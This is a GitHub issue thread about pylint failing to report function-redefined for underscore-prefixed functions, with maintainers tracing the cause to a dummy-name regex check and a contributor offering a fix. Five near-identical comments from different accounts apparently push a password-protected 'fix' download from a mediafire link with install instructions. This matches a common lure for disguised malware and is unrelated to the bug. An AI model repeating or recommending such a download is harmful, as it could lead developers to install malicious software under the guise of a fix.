### ISSUE TITLE
False Negative function-redefined when function named with leading underscore

### ISSUE THREAD

**Issue by daviderie** [pylint-dev/pylint#9894]
### Bug description

```python
When defining a function that is named with a leading underscore, Pylint does not raise the function-redefined error as expected.

E.g.:
{code}
def _my_func(self):
    ...

def _my_func(self):
    ...
{code}
```

### Command used

```shell
pylint my_package
```

### Pylint output

```python
-------------------------------------------------------------------
Your code has been rated at 10.00/10
```

### Expected behavior

E0102: method already defined line 86 (function-redefined)

### Pylint version

```shell
pylint 3.2.6
astroid 3.2.4
Python 3.11.3 (main, May  4 2023, 15:16:43) [Clang 14.0.3 (clang-1403.0.22.14.1)]
```

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Pierre-Sassoulas** [comment]
Thank you for opening the issue. We have some mechanisms so that name with underscore are ignored, they should probably not be ignored for ``function-redefined`` though, there's no good reasons to ignore that one imo.

**Comment by nickdrozd** [comment]
`basic_error_checker.py` has:

```python
            dummy_variables_rgx = self.linter.config.dummy_variables_rgx
            if dummy_variables_rgx and dummy_variables_rgx.match(node.name):
                return
            self.add_message(
                "function-redefined",
                node=node,
                args=(redeftype, defined_self.fromlineno),
            )
```

Test case:

```python
def dummy_func():
    """First dummy function"""
    pass

def dummy_func():
    """Second dummy function, don't emit function-redefined message
    because of the dummy name"""
    pass
```

I guess the idea is to skip this check for certain names? But I don't know why that would be desirable.

**Comment by Pierre-Sassoulas** [comment]
It's useful when you want to ignore that a variable is not used for example, for ``for _ in range(3):`` or in a function definition for an API you can't change (without a pylint: disable). It's been extended too much here, ``function-redefined`` has no reason to be disabled with a shorthand (I don't see why it would ever be disabled with a pragma either?). The semantic between variable and function prefixed by ``_`` is very different (protected function vs known unused variable) and are not interchangeable.

**Comment by Akshay9715** [comment]
Hi 👋, I’d like to work on this issue. I will update the check in `basic_error_checker.py` so that functions with leading underscores are not skipped by the dummy variable regex, and add tests to ensure function-redefined is raised. Please assign it to me if that’s okay. Thank you!
